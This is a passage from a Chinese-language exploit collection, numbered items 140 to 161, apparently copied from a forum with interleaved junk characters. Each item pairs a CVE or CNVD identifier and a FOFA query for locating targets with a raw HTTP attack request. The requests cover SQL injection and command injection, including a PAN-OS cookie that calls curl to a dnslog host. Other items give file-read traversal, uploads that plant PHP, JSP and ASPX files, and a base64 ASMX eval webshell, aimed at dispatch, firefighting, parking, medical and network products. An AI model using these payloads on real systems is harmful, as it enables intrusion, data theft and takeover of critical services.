Accept-Encoding: gzip, deflate, br6 M# ?7 a0 |0 e, |! ^, H
Connection: close* i. a& U: J0 Y; x. Z: D
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk1 \3 D$ k) G( G2 _
Upgrade-Insecure-Requests: 1. r) | o; U& K% W# v3 ?
, L# x' t0 q! ]- F7 K* H' X* @* T( D( Y7 L
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入" w0 y& s& `" ?$ w
CVE-2024-2566
- a6 G) _: m0 A* M! xFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 W8 i; z% Z1 bGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1. T0 `% @- ^5 A/ F; O' K& @) J7 z" C
Host: x.x.x.x( P3 K" H4 |! k$ D8 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) h- f* v' |, J1 d0 L! }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" |3 [5 ~" J! LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, Z! d u. y% Y- A8 y& ?2 i1 X* v
Accept-Encoding: gzip, deflate, br5 c7 f* g' k# ?3 |/ z# m q- I
Connection: close
3 F! @" x5 w/ X5 x& WCookie: authcode=h8g9
5 C$ z2 U5 x9 N7 UUpgrade-Insecure-Requests: 1$ e3 v/ S$ R" G2 r8 _
8 K+ Y2 U3 ~/ f1 D# P4 x; `
0 ^& }& k: G* B% A1 s( o+ \
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入/ x$ |4 B5 y9 U& Z8 e; Q1 `
FOFA:body="指挥调度管理平台"6 z" e2 V6 z2 u8 L0 Q, P
POST /app/ext/ajax_users.php HTTP/1.1& m* D% ?4 a% k' u5 N
Host: your-ip
9 e' I, q% ]7 p( |# KUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
% F. G$ @& d" m: `! @Content-Type: application/x-www-form-urlencoded
P8 J& E. T6 s' i: X# `, W6 _, a) D, k) T. g
) V) \2 N$ n9 d: V8 U( O$ W5 z; Xdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
$ x, F4 G% N+ a. J, V( A, n8 j- p" I: U* G) j* y+ K. ^: G
% G3 h7 G! N1 k4 j' G1 c& Z- e
142. CMSV6车辆监控平台系统中存在弱密码
/ x' l: V3 u4 L9 c( vCVE-2024-29666
7 w) a4 Q8 h2 x' S5 M. XFOFA:body="/808gps/"
: B, s0 O( A0 M; z( Fadmin/admin9 l# y, h4 P! w, ], M/ w4 @- Z
143. Netis WF2780 v2.1.40144 远程命令执行& q, X0 [/ s1 { J$ q0 ?* w
CVE-2024-258508 K' ~9 Z4 F1 ?" d+ d
FOFA:title='AP setup' && header='netis'( |: W( |. X* f( I8 S
PAYLOAD/ v" s. |; }. ~% Z' _8 c
( M* j( }2 \2 F( C
144. D-Link nas_sharing.cgi 命令注入
2 k2 e& i% G" q! B- f7 P' C" Q6 iFOFA:app="D_Link-DNS-ShareCenter"1 x/ Y6 J& ~$ s- X9 K8 r
system参数用于传要执行的命令
) N( i' {. j, c9 ^4 Y1 ~& P! d/ pGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
9 H+ q4 [# h; b$ s( AHost: x.x.x.x: p- L" n4 W9 c4 m
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0: H# G' H3 a/ g3 X4 ^7 [6 y9 {
Connection: close
, v4 M# K& d% i1 b2 bAccept: */*, x" E) P& |0 @" ~3 E
Accept-Language: en7 ~3 C- w5 G1 g+ G& \+ Q
Accept-Encoding: gzip
$ l3 y% _! ?4 h7 \1 `( H; [' r0 m3 f" ^; i
1 b$ G* s1 q1 s0 y
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入7 u0 s: o% u' \$ I* @6 Y3 |
CVE-2024-3400
6 }4 ^0 d6 h. j# Z+ aFOFA:icon_hash="-631559155"
6 M! t4 G } o& l0 dGET /global-protect/login.esp HTTP/1.1& }; Q' v+ J. g/ W1 F' `
Host: 192.168.30.112:1005, [; j0 }. z# y# U+ j; q3 ^% c* `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84. j9 Z& `+ u* S
Connection: close$ e. m5 _( ~" _+ w# c" x& P& `
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
2 U& W) Z# A$ N3 y) {9 fAccept-Encoding: gzip
: A# g& [! v2 |
; O7 T" E. ~) H9 e3 `) v/ A) D0 i Y- D2 x, x- E
146. MajorDoMo thumb.php 未授权远程代码执行' ] ]5 }2 f1 T) @( b3 c+ V
CNVD-2024-02175
: i4 l; _6 C( i8 Y6 xFOFA:app="MajordomoSL"
. t' J" B8 E9 b/ ^8 l8 p$ f% \GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
. w4 \( U5 V, n0 k: h; J" e1 oHost: x.x.x.x+ \ A( }7 Y5 c+ [; p* _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84; e- o/ e% `8 o# V1 I
Accept-Charset: utf-8$ P. S3 d1 x2 E* |
Accept-Encoding: gzip, deflate" _7 a# E; E3 ]- Q& Z( G
Connection: close8 B' I1 [% a; M! J; @* b
5 q4 b; s/ _- O0 B$ B. u) u$ N6 K7 {
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历4 ]: r/ H! D5 w: U% G) s- r
CVE-2024-32399& ?, p# M4 T- ^: c4 f2 q" e/ \- _
FOFA:body="RaidenMAILD"
/ u- m; u8 e- L/ }' I+ JGET /webeditor/../../../windows/win.ini HTTP/1.1& i v Y+ C- I
Host: 127.0.0.1:81
$ g4 p) D# j, O+ k: TCache-Control: max-age=0
, W3 E- ?, i7 h$ s4 ~' KConnection: close! C( ]+ o! \) H( n+ Y
; P/ m) a/ c8 d3 I& b& T
6 L; o' g1 K& {, T! L# r) k
148. CrushFTP 认证绕过模板注入
) K$ n( k2 O4 V; VCVE-2024-4040
4 n7 Y, Y7 J4 B. T, x7 d* cFOFA:body="CrushFTP"
) T% o. I* |. EPAYLOAD
' C" Z2 u& `) d2 B) v8 ]5 T: a5 v
3 D$ }8 \ ^4 }4 E% q1 G149. AJ-Report开源数据大屏存在远程命令执行' V$ x1 E4 B- }
FOFA:title="AJ-Report"4 x6 o2 E% R2 a8 j
2 L% ~/ d+ r H7 w" ?8 t1 ~7 ]POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
$ w- l% Z3 D/ E& J1 O/ w& BHost: x.x.x.x
" B* p( @+ [* g! i1 _" `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ H% y% J; K( ~1 ]4 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& t! W" P/ z, H
Accept-Encoding: gzip, deflate, br% B% K, @9 W( ]$ g# A* K' Y
Accept-Language: zh-CN,zh;q=0.9
) K! S4 M3 w$ f) qContent-Type: application/json;charset=UTF-8
" X+ w0 ^: j, \. hConnection: close
7 a( D: A( h% F2 M+ u) \' I! Y& x* { X4 [
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}- u! |+ c. V$ o. l+ A+ J* G$ V
* i8 C2 J- A. n! t1 E. Y150. AJ-Report 1.4.0 认证绕过与远程代码执行
* t! p$ y/ P; f; g' O, q( F$ e5 {; S! W6 RFOFA:title="AJ-Report"
+ ^0 T$ Z% ` \7 {0 PPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1, p9 q% _4 W1 }; p
Host: x.x.x.x. J, k# K/ B: y* I9 `9 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. t- J9 I6 ^/ H$ j. p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ n/ \# K5 v& @1 ~* @Accept-Encoding: gzip, deflate, br
m! {9 E% m& R x# g* C0 T& I" EAccept-Language: zh-CN,zh;q=0.99 N0 I: n+ W1 c4 l& c
Content-Type: application/json;charset=UTF-8
9 D* e% @% S8 m& K1 qConnection: close
4 T4 S7 ^; N/ ^Content-Length: 339
z- H- O4 _; [: d" i y. u4 L; k4 j* d1 q: ~! H& g
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}8 @% p# e/ M$ Z: m6 Q# T
7 L& }4 E6 `- u- z: Q: a8 j/ O
' _8 m- ]/ r- ]- a& d! n- T151. AJ-Report 1.4.1 pageList sql注入
) l u: f6 ?3 l1 H3 h2 r8 V8 T0 xFOFA:title="AJ-Report"( g$ z* E7 y# M7 l" R% ]
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1- b, R$ Y8 e9 k& y! ^: }4 l
Host: x.x.x.x/ \ p' | S+ X4 u9 D- L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 G+ \( Y! {1 J# u6 i6 l0 r; |/ {Connection: close
' w* z7 N( C5 {Accept-Encoding: gzip
& \5 d& i( g( V) c4 o+ L7 a% N8 w6 @9 z" w$ y
& A% s5 U- y2 K- K$ k) \" t152. Progress Kemp LoadMaster 远程命令执行
# w$ d( ^! r0 |) ]: D/ CCVE-2024-1212- @8 g# k$ ]% q+ I6 k! v# c5 f% n
LoadMaster <= 7.2.59.2 (GA)
: B+ n# M1 t5 r: L5 pLoadMaster<=7.2.54.8 (LTSF)
& ], [$ M8 q C3 J. P5 wLoadMaster <= 7.2.48.10 (LTS)
+ n# D8 x. u/ ?9 G; O$ dFOFA:body="LoadMaster"0 m- T" i8 q" I0 A
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
# [# ^, O% H" ?. IGET /access/set?param=enableapi&value=1 HTTP/1.1
! }; b K1 r+ E% N1 L5 ? JHost: x.x.x.x$ b& ^% R, K! L- k' O5 r# L# m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
& E7 S: ^# M' s$ ]Connection: close
5 m7 x6 q# J0 y; B: T/ LAccept: */*
& j0 \( `$ T, c: n. q1 T# _Accept-Language: en! f3 V) S$ {0 `
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=0 [& B) v3 ^; U2 J6 A. c
Accept-Encoding: gzip9 n0 S+ F; h3 q- h) U" ~ D
7 s: j/ u0 v9 t- Q! B' i6 P2 K4 n% V7 [5 a* x' m x D
153. gradio任意文件读取
" u' Q2 i5 {; g- PCVE-2024-1561FOFA:body="__gradio_mode__"8 I% B9 E. O3 [
第一步,请求/config文件获取componets的id
0 C4 h* L9 ~4 ~, l+ E2 E3 rhttp://x.x.x.x/config: c4 M" N; F) w* Q5 X3 E
6 j. |2 K: h3 q( D! l8 I' x! x
5 Q" o. `% k# l6 j: k, J第二步,将/etc/passwd的内容写入到一个临时文件$ F$ K0 Y2 V r( F
POST /component_server HTTP/1.1+ E0 H7 J- r9 Y1 s2 V; h
Host: x.x.x.x6 @9 o5 k0 [4 z- @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3' \6 p: x) C9 P& ?
Connection: close) L, F# W& O' p- k0 k" l
Content-Length: 115
4 F9 V2 \7 F: M1 iContent-Type: application/json( }: J0 ^$ D% c7 l$ _% ~5 p
Accept-Encoding: gzip U3 ?+ ^5 r7 [& j
$ R$ f+ V- B& h9 Z
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
4 h8 O7 X# N5 }2 E: r. d
9 V& E% B2 l" n/ x$ p& p& {6 E) K* e/ E
第三步访问
& `" X0 @* v$ {" A; a* m. B1 [! Zhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
) E" i5 Q3 a& r$ c$ j8 X, U/ W: Y) {+ }" H9 Z. L/ K# g( u9 f2 B
. `- ]. M1 r. ~* N5 Q4 c9 |8 K4 M
154. 天维尔消防救援作战调度平台 SQL注入
- f6 a0 z) J1 wCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
+ x- H+ `& b& dPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
- s. }, j- n9 k8 G0 Y- ?Host: x.x.x.x% j; p& _6 P* U3 |& \" p' j
Content-Length: 1061 j9 X: H+ v: t& W! K, S
Cache-Control: max-age=0
, m8 U3 n/ N) |& U. K' \Upgrade-Insecure-Requests: 1
! {+ Z" E& Z/ ^5 b8 Q9 ^Origin: http://x.x.x.x
1 j0 ` J% J3 _! G' Q5 { ^Content-Type: application/json8 ?, V( l# ]# ~/ l( U, `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
1 m) P- U, A: U- N5 k8 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' G' e. F6 n/ ?! P
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
( q8 `. ^; b1 o U4 S5 TAccept-Encoding: gzip, deflate1 H6 M5 ~2 S0 O7 A( `' {! Z
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7* Y' @% d+ }, ]% W* d# `
Connection: close
) u; p) \( [; S' _1 F" }/ r8 J. f( \( D
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}& N8 R) j. A; e# n( Z- b. k
- V& F( w; s; Y# |; V
) L: E! F# M: f* f% N% O' w155. 六零导航页 file.php 任意文件上传
+ }+ o. J. L2 I) k& bCVE-2024-34982
. k9 T8 s, B. K9 v6 nFOFA:title=="上网导航 - LyLme Spage"# N" M; |% a5 U Z! C
POST /include/file.php HTTP/1.1! J+ }7 x, Y0 a: H
Host: x.x.x.x
5 Z2 T# U, d5 l6 g) Q' TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
& w8 Y' ^% b% ~7 q8 F8 J jConnection: close
& w+ \; n" V; Z# ^- G5 b- EContent-Length: 232* F/ t x5 Z3 k( y( ^
Accept: application/json, text/javascript, */*; q=0.01
. {+ T8 u# b' f6 QAccept-Encoding: gzip, deflate, br
' C) m2 {5 v8 L7 V# o3 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 c4 b1 A) Y) V* s2 r* x2 r, b6 p
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f3 L z% B+ {( a& u3 a" g p
X-Requested-With: XMLHttpRequest
4 @. l# E2 L+ Y8 g0 |. K
( i$ ^; ?9 A8 l0 }-----------------------------qttl7vemrsold314zg0f+ e6 M/ @, H4 B' @
Content-Disposition: form-data; name="file"; filename="test.php") p3 P4 U7 p8 r- i: H& T( m
Content-Type: image/png% `, y+ R% x: Z" N: Y: ^" B3 s$ E
. M1 `4 W1 k9 }% a( g<?php phpinfo();unlink(__FILE__);?>
* H8 {, o$ X/ G4 ~6 [-----------------------------qttl7vemrsold314zg0f--
5 t' O R. ~9 v8 W& w/ Y
! n; b. K4 H9 `0 m. E& o" a: E& |9 h" S7 Z# s& Y
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php# g3 R) T# x6 @6 Z9 o! S: `
8 w8 ]5 W+ L4 w1 F& F5 h3 ]- o
156. TBK DVR-4104/DVR-4216 操作系统命令注入
! P8 Q1 V; P. G. N# \% ?3 dCVE-2024-3721
- r# ` T7 G9 O* G. U @0 \+ b) {FOFA:"Location: /login.rsp"
$ T& @- x/ H/ `, k·TBK DVR-41045 E9 r$ C( p" [5 w" \
·TBK DVR-4216
, ?( C* z! z+ ?2 ?curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"+ U( `* w6 Y, D# Q9 Q2 w
* Z6 @0 m2 w, v% o- l" q
$ j; P' e8 g$ c! _6 q, z; P; Z2 ePOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1. K3 B+ ^7 k. X& J, ]6 f
Host: x.x.x.x, ~- ^' R* j! ]+ D- ?
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& d% {3 o7 J' LConnection: close/ @' R+ a0 h q) _0 M X/ C
Content-Length: 02 c4 G* [6 G! K" {% C" M
Cookie: uid=17 D" h+ F9 t) }
Accept-Encoding: gzip
0 } c0 w! F- x L2 {# x; x) Z, ^- R7 M/ [6 A
+ [1 M" b/ f2 z n, ]. n* c
157. 美特CRM upload.jsp 任意文件上传! L, k3 C ^ {2 a- d
CNVD-2023-069710 g* B5 W j+ `' R8 q
FOFA:body="/common/scripts/basic.js"7 ~4 A: G7 d& H
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
! p1 G f: ], e$ X5 o, i- N2 uHost: x.x.x.x
8 \( r. k' O8 p! H& }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
* w8 t. n" }$ S' ?1 L5 i, TContent-Length: 709 V1 G% A. x5 x0 l; E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; g; q: y/ p3 N- r8 W% r/ ?. _
Accept-Encoding: gzip, deflate6 c5 V% v a; u2 z5 u5 _, p8 Q3 r
Accept-Language: zh-CN,zh;q=0.90 b8 [8 X/ v m' I' S
Cache-Control: max-age=0
% P" D0 ~9 u8 B5 L# y0 _; [Connection: close5 c4 C* v: f1 ^5 {9 L/ M
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN$ Y6 o% l, P& }' Q O
Upgrade-Insecure-Requests: 1 F% S4 [# p7 [ m: Q T
. i+ x# v3 x. _! P2 F
------WebKitFormBoundary1imovELzPsfzp5dN! J9 o5 A% n" X6 E( t; a+ T
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"! l% Y9 O6 h5 R$ e+ \3 x) A
Content-Type: application/octet-stream; T8 R% L, c/ M7 ]. e# Z
9 H8 q6 v! }/ g: r
nyhelxrutzwhrsvsrafb o5 N5 g1 N8 J+ _9 \
------WebKitFormBoundary1imovELzPsfzp5dN
( \- W0 |0 s& {/ E* Q$ X4 i1 q) }5 U7 xContent-Disposition: form-data; name="key"- h5 P# e: [ P, [1 g
( h" o) L5 o& ~! F2 J+ }6 b1 y6 o
null
- z, F- }# ^+ l; G" ?------WebKitFormBoundary1imovELzPsfzp5dN
7 `5 w/ A8 j; \$ J" KContent-Disposition: form-data; name="form", i* [2 c+ w [6 b/ M# D; @8 z6 |2 C
: p& F( u% B8 E, ~4 Q- ^/ j
null
% G6 x4 p% v0 G9 j! m------WebKitFormBoundary1imovELzPsfzp5dN4 z+ a' \0 K+ N( _7 m% Q6 @
Content-Disposition: form-data; name="field"& o1 o& d/ H! N( v/ |* R
& s% X# o9 M: ?7 u6 Tnull- j) Z ~# y' e( R6 B
------WebKitFormBoundary1imovELzPsfzp5dN+ B$ A, T9 m1 ]2 d2 C4 D2 v& X7 u
Content-Disposition: form-data; name="filetitile"' M* `8 r h2 p6 e" z4 C2 R
3 E9 r0 ^6 Y: P+ a; ?" l$ _null
+ T- F9 w. K$ E9 D& W------WebKitFormBoundary1imovELzPsfzp5dN
, f2 Z: q1 C: X0 {. \7 m8 YContent-Disposition: form-data; name="filefolder". P- a% _% E, j7 P7 a; P
$ {$ n4 C+ g* P: N: ?/ i; V
null; I( H8 o' f8 J
------WebKitFormBoundary1imovELzPsfzp5dN--
0 T: z7 m" b9 ~! @+ F- X3 J
1 N! g( N# \6 H
- p/ W. a' u( J2 P" ], Ahttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp- G Q6 B% Y& h9 w( I ]
1 m% n a" ]5 j8 x2 w9 U M: p158. Mura-CMS-processAsyncObject存在SQL注入
( `; F2 U8 _( Y, ]+ C4 C5 MCVE-2024-32640
; Y X; B, w) _/ t2 e8 mFOFA:"Generator: Masa CMS"
6 j4 w5 R7 h% hPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
& M. ^! L# {' ~# ?/ n5 tHost: {{Hostname}}8 H; J' u/ F' X; o6 ]7 k9 ?2 a; H
Content-Type: application/x-www-form-urlencoded* `9 Z' l) @6 n1 N
8 h0 P* @1 t& y5 d+ M
object=displayregion&contenthistid=x\'&previewid=1
( T1 N! F. J/ w5 n7 {% h, A( W2 ^9 e" {! S% Y
' q( t7 h5 {# x9 e" Y
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传' S1 F0 h% q! Q
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
! j8 ]- A) K' J6 MPOST /webservices/WebJobUpload.asmx HTTP/1.11 I8 S0 Q, C; s) K
Host: x.x.x.x1 `# q2 u% L7 Q- U( E% G: }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.367 t- B e' ^1 U; G* ]
Content-Length: 1080
. u9 S5 m1 u- r9 [8 h4 K& B+ XAccept-Encoding: gzip, deflate
/ y# j Q8 W( b- i9 w$ E8 oConnection: close1 F8 @4 B) v0 Z: h9 h& \' v; G
Content-Type: text/xml; charset=utf-8
" f, B0 U: A+ `' D1 YSoapaction: "http://rainier/jobUpload"
9 T2 q F. ]1 w# ~& O* i' s1 B, ?& ?( I: _2 V1 l
<?xml version="1.0" encoding="utf-8"?>) R* n; b8 Q7 T8 i9 j7 w
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
& p5 Y2 _3 G5 p5 r<soap:Body>* n: V. l+ i: a7 Z/ I4 w- B
<jobUpload xmlns="http://rainier">
l4 j8 y6 z. P/ w y: G<vcode>1</vcode>* @; T, U; `' ^# z' f1 X' s: E
<subFolder></subFolder>
9 s9 b! G8 C0 |, y, K* W& A5 ]7 E<fileName>abcrce.asmx</fileName>
6 j, j1 I! w; O. F# }$ T0 ^* k<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>+ K4 n" P5 o. D# T+ j8 [' o7 z
</jobUpload>' q5 l. J1 t/ J
</soap:Body>% ] p* A! p, y4 A3 ^7 E
</soap:Envelope>! j# v1 f& P d* w e
s; ]6 R2 L! b: @6 a: v7 n
3 n3 B. \8 E# j% k( o7 k* A: o3 H
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
$ [3 V, H2 M7 Z, T0 I z: t0 F$ ^) }# ]$ B
* d' @2 x) ?4 ]
160. Sonatype Nexus Repository 3目录遍历与文件读取% {0 x$ C# S' N8 w
CVE-2024-4956
1 q& C0 e+ v& Z, M" y. YFOFA:title="Nexus Repository Manager"/ ]6 w8 U8 @* y/ m/ Z% p2 W- e: u7 k
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1& |. D$ p6 [3 \' a
Host: x.x.x.x
# f" d+ ?9 @4 aUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0& B, ~7 d" \- e
Connection: close# g' J: I3 v1 V) T) z
Accept: */*, Q# C0 }8 U" W3 o" k* _
Accept-Language: en
& [4 D& n' P0 d- v! sAccept-Encoding: gzip3 l2 f& Y7 W; _" M: _: ^2 P$ x: c
2 x S8 O, ^9 C! c1 O G/ i
% f) Q0 I1 J f1 u6 P161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% z* d+ G! E# R
FOFA:body="/KT_Css/qd_defaul.css"3 B$ m; \" Y" @' y2 ^, W
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
) o" B5 |8 `2 j: Y+ ?: E0 d, o/ FPOST /Webservice.asmx HTTP/1.1
, Q8 C* T4 F4 @& H, S' XHost: x.x.x.x+ x, Z/ n' D1 ~# ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
) a* @9 w0 y4 t" KConnection: close
8 l. S7 N+ b# `6 xContent-Length: 445* C7 y# s: E. f0 Z3 O
Content-Type: text/xml
; `4 r) M) m9 L8 z- u3 {2 H! dAccept-Encoding: gzip
- {8 a1 C. [& [# Y% e; q! s' N. E
& p2 \/ S% Q7 k6 t4 G4 K/ x<?xml version="1.0" encoding="utf-8"?>
( ]4 T$ o6 w/ P: @<soap:Envelope xmlns:xsi="
& N. {+ c& w/ b) I( \, Fhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema". j9 b: j4 F: u. U& u' V$ U0 ?' X* `
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
/ a, c( Y% Q J5 D<soap:Body>/ F$ A& x1 [5 U" G6 U; {4 F: y
<UploadResume xmlns="http://tempuri.org/">3 G0 X- o( ?& o% ?
<ip>1</ip>
8 z/ C9 ~7 Q$ w9 Y3 n<fileName>../../../../dizxdell.aspx</fileName>
( [5 {% c- O% K& j* [2 z<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>5 X4 \ s: R X" X' Y& ?' p9 M
<tag>3</tag>
! C0 A5 J" R4 o. |8 S* f</UploadResume>
]. v) N+ {' t: d5 x" S9 J# R</soap:Body>: ?9 p/ y( O7 z6 P$ U# O
</soap:Envelope>
- ~/ S; s! x N/ ]4 g2 Z8 s( g( U& }6 _
1 R1 e4 u/ O+ j- ?http://x.x.x.x/dizxdell.aspx
% G) w7 `5 S' t
